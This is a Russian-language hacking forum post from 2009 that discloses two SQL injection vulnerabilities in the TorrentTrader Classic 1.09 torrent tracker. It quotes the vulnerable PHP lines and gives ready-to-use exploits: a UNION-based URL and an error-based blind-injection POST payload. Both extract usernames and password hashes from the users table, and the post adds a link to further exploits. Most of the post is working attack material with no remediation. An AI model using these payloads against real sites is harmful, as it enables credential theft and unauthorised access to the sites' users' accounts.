
15.12.2009, 13:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме: 3217552
Репутация:
1668
|
|
TorrentTrader Classic 1.09
Version : 1.09
SQL Injection
Vuln file: show-archived.php [str:23]
PHP код:
$query = 'SELECT title, user, date, text FROM news WHERE id=\'' . $_GET['id'] . '\'';
$resu = mysql_query($query) or die(mysql_error());
Exploit:
if magic_quotes = OFF
Код:
http://[host]/[path]/show-archived.php?id=1'+union+select+null,null,null,concat_ws(0x3a,username,password)+from+users+--+
Blind SQL Injection
Vuln file: account-signup.php [str:73]
PHP код:
$a = (@mysql_fetch_row(@mysql_query("select count(*) from users where username='$wantusername'"))) or die(mysql_error());
Если версия MySQL=> 5.0.12 и magic_quotes = OFF, можно получить данные из ошибки Duplicate column name
Exploit:
Код:
POST http://[host]/[path]/account-signup.php HTTP/1.0
Content-type: application/x-www-form-urlencoded
wantusername=xek' and (select * from (select * from (select name_const((select concat_ws(0x3a,username,password) from users limit 0,1),1)a)b join (select name_const((select concat_ws(0x3a,username,password) from users limit 0,1),1))c)d)/*
--------------------------------------------------------------
Другие уязвимости этого трэкера
http://www.milw0rm.com/exploits/8958
|
|
|